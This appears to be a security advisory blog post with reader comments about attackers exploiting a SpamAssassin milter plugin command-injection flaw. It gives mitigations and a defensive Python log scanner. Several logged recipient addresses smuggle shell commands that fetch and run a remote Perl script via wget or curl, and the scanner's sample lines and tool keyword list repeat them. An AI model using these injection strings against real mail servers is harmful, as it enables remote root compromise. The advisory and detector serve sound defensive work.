Spamassassin Milter Plugin Remote Root Attack

Published: 2010-03-15
Last Updated: 2011-01-30 04:34:25 UTC
by Adrien de Beaupre (Version: 2)
4 comment(s)

Observant reader Roy caught an interesting exploit attempt against his SMTP server. His review of the logs turned up this:

Messages rejected to recipient: root+:|wget
       hxxp://;perl p.txt:[] : User unknown in local recipient
       table; from=<> to=<root+:|wget
       hxxp:// : 1 Time(s)

Handler Bojan notes that it appears the bad guys have started actively exploiting the SpamAssassin milter vulnerability that was published last weekend (more details at

The perl script collects some information about the local host and tries to send it to on port 80 -- this host appears to be unreachable at the moment though.

Update: SecurityFocus BID 38578

Mitigation: There is a preliminary patch available at the SpamAssassin Milter Plugin project site, bug #29136: SpamAssassin Milter Plugin Input Validation Flaw Lets Remote Users Execute Arbitrary Code:

Alternatively, do not use the -x option when running this plugin, and do not run it as root.
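As an added example (not code from the diary or from the spamass-milter project), a small Python check that flags recipient addresses of the shape shown in the log excerpt above in sendmail logs, and reports whether a spamass-milter EXTRA_FLAGS line enables -x. The log lines and the EXAMPLE.invalid host are constructed.

```python
import re
import shlex

# Constructed sample log lines (not from the diary); modelled on the logwatch
# excerpt and on the "rcpt to:" attempts quoted in the comments.
SAMPLE_LOG = """\
Mar 15 01:02:03 mx1 sendmail[1234]: o2F0123A: from=<>, to=<root+:|wget hxxp://EXAMPLE.invalid/p.txt;perl p.txt>, reject=550 User unknown
Mar 15 01:02:04 mx1 sendmail[1235]: o2F0124B: from=<bob@example.net>, to=<alice+newsletter@example.org>, stat=Sent
Mar 15 01:02:05 mx1 sendmail[1236]: o2F0125C: from=<>, to=<root+:"|curl hxxp://EXAMPLE.invalid/p.txt">, reject=550 User unknown
Mar 15 01:02:06 mx1 sendmail[1237]: o2F0126D: from=<carol@example.com>, to=<postmaster@example.org>, stat=Sent
"""

# Characters that have no business in a recipient local part but are
# meaningful to a shell; the -x code path passes the recipient to a
# popen()'d "sendmail -bv", which is why they matter here.
SHELL_META = re.compile(r'[|;&`$<>(){}\\"]')
TO_FIELD = re.compile(r"to=<([^>]*)>")
TOOLS = ("wget", "curl", "GET", "fetch", "lynx")

def suspicious_recipients(log_text):
    """Return (recipient, tools) for each to=<...> whose local part has shell metacharacters."""
    hits = []
    for line in log_text.splitlines():
        m = TO_FIELD.search(line)
        if not m:
            continue
        rcpt = m.group(1)
        local_part = rcpt.rsplit("@", 1)[0]      # "+" extensions stay in the local part
        if SHELL_META.search(local_part):
            tools = [t for t in TOOLS
                     if re.search(r"\b%s\b" % re.escape(t), local_part)]
            hits.append((rcpt, tools))
    return hits

def uses_expand_flag(extra_flags):
    """True if an EXTRA_FLAGS string (as in /etc/sysconfig/spamass-milter) contains a standalone -x."""
    # Only a separate "-x" token is detected; combined short options such as
    # "-mx" would need getopt-style parsing.
    return "-x" in shlex.split(extra_flags)

if __name__ == "__main__":
    for rcpt, tools in suspicious_recipients(SAMPLE_LOG):
        print("suspicious recipient %r (tools: %s)" % (rcpt, ", ".join(tools) or "none"))
    print("EXTRA_FLAGS enables -x:", uses_expand_flag("-m -x -u spamass-milter"))
```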

Adrien de Beaupré Inc.




On FreeBSD, a fix hasn't yet made it into ports. Is there any mitigation against this attack aside from disabling spamass-milter for the time being?
I'm using spamass-milter on CentOS 5.x (a.k.a. Red Hat Enterprise Linux). Fortunately, the RPM as distributed by Red Hat doesn't use the "-x" flag. *whew* Just check your /etc/sysconfig/spamass-milter EXTRA_FLAGS to see if you added it yourself.

To double-check I attempted the exploit described at the Full Disclosure link (above) and it didn't work.
I have logged attempts to use curl as well.

rcpt to: root+:"|wget"
rcpt to: root+:"|GET"
rcpt to: root+:"|curl"
@BillBixby: The preliminary patch linked to in the article applies nicely within the port. Just copy it to ${PORTSDIR}/mail/spamass-milter/files/patch-popen and force a rebuild and reinstall of spamass-milter. Tested here on a couple of MTAs (8R-p2 base Sendmail).
